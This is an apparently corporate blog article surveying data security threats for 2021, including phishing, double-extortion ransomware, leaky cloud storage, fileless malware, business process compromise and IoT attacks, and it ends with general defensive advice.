A lot has changed since the COVID-19 pandemic arrived on our shores, including the already complex and evolving world of data security. Many more employees are now working from home, and many will continue to do so, even after the pandemic eventually subsides.
Allowing employees to work from home can be beneficial for both parties, however, many companies were woefully unprepared for the security challenges that such a shift would bring.
According to Channel Futures, there’s been a 40% increase in the number of devices using an unsecured remote desktop protocol (RDP) connection, which makes it easier for cyber-criminals to brute-force their way into an employee’s device, and thus potentially gain access to valuable company data.
With or without a pandemic to contend with, it’s fair to say that the upsurge in data security threats would have continued to plague organizations across the globe.
And, to add insult to injury, we are still grappling with a serious shortage of cyber-security professionals. Let’s take a deeper dive into the main data security threats that we need to watch out for in 2021.
Pandemic-related phishing attacks
Cybercriminals will continue to look for ways to capitalize on the ongoing crisis. Over the past year, the coronavirus pandemic has been the theme of a plethora of phishing campaigns. Some of them involved emails pretending to be from a CEO, containing malicious attachments that masquerade as a guide on how to stay safe.
Others pretend to be from a government agency sending out economic stimulus payments, in an attempt to obtain the victim’s bank account details.
Double-extortion ransomware attacks
Double extortion ransomware attacks are where the attacker steals sensitive information before distributing the ransomware program. Following a successful infection, the attacker will threaten to leak the sensitive data if the ransom is not paid. According to an article published to The National Law Review, Cybersecurity Ventures has predicted that a business will fall victim to a ransomware attack every 11 seconds in 2021 – down from every 14 seconds in 2019. They also predict that the total cost of ransomware will exceed $20 billion globally.
Misconfigured cloud-storage facilities
As more companies adopt cloud services, we will likely see an increase in the number of data breaches caused by misconfigured storage facilities. Over the last few years, we’ve seen a large number of cases relating to “leaky” Amazon S3 buckets. To be more precise, misconfigured security settings allow the buckets to become publicly accessible over the Internet. While AWS has ensured us that the S3 buckets are now private by default, they are still criticized for making it too easy for the average user to misconfigure their accounts.
File-less malware attacks
File-less malware is a form of malware that doesn’t arrive in the form of a file, nor does it typically create new files either. Instead, it is designed to operate in memory, without ever touching the hard drive. The absence of a file-based payload makes file-less attacks harder to detect than traditional forms of malware.
File-less malware typically works by leveraging legitimate tools that are part of the victim’s operating system, such as Microsoft Windows PowerShell. PowerShell is often used by administrators for automation and configuration management. Using the command-line shell and associated scripting language the attacker can perform pretty much any operation they want on the underlying operating system.
Business Process Compromise (BPC)
In some cases, cyber-criminals will seek to exploit vulnerabilities in business processes, as opposed to the applications that are used. A simple example of how an attacker might compromise a business process would be where they change the bank details on an automatic invoicing tool in an attempt to receive payments when future invoices are paid.
As you might expect, in order to compromise a business process, the attacker must acquire an in-depth knowledge of the processes that exist within the target organization’s IT environment, which requires research and patience.
While there are few statistics available that can help us understand the scale of BPC, we know that attackers have realized that highly targeted attacks often yield the greatest rewards.
Attacks on IoT systems and devices
According to a recent report by Nozomi Networks, the first half of 2020 saw an increase in attacks on Internet of Things (IoT) devices and networks. Most attacks came from IoT botnets, which are used to perform Distributed Denial-of-Service attacks. Increasingly more industries are implementing IoT devices and applications for a variety of reasons.
Some companies are using IoT devices to automate their security systems and to keep track of who is entering their premises. The United Parcel Service (UPS) has developed an On-Road Integrated Optimization and Navigation (ORION) system that identifies the shortest and most fuel-efficient routes. IoT devices have also been used to improve renewable energy technologies, such as wind turbines, to keep them running at peak efficiency and protect them from damage.
As organizations continue to find more innovative ways to use IoT devices to streamline their operations, cyber-criminals will be doing everything they can to exploit their vulnerabilities.
As always, the first line of defense against phishing attacks, including the distribution of ransomware, is to ensure that your employees have been sufficiently trained to identify potentially malicious email links and attachments.
To help prevent attacks that take advantage of Remote Desktop Protocol (RDP), you should only allow remote access from known IP addresses that come from a known VPN server, which also hides the RDP connection ports to the public internet.
For the sake of obscurity, you can also serve up RDP on a non-standard port number, which may help to protect against simple attack vectors. Also, it’s a good idea to use multi-factor authentication (MFA) whenever possible. Always make sure that you check the security settings on any cloud storage solutions you use and use a Data Security Platform to help you keep track of who is accessing your sensitive data, when, and how.
Securing IoT devices can be slightly more involved, largely because they are difficult to patch, and the absence of a user interface can make it difficult to instruct users on how to deploy updates. However, this problem can be mitigated by using an automated patch management solution from a trusted vendor. It is crucial that any default passwords for IoT devices are replaced with strong passwords, and Universal Plug and Play (UPnP) should be disabled on all IoT devices.
Additionally, IoT devices shouldn’t have access to sensitive data, and should ideally be kept on a separate network that is unconnected to your main network. Finally, whenever possible, disconnect your IoT devices from the internet.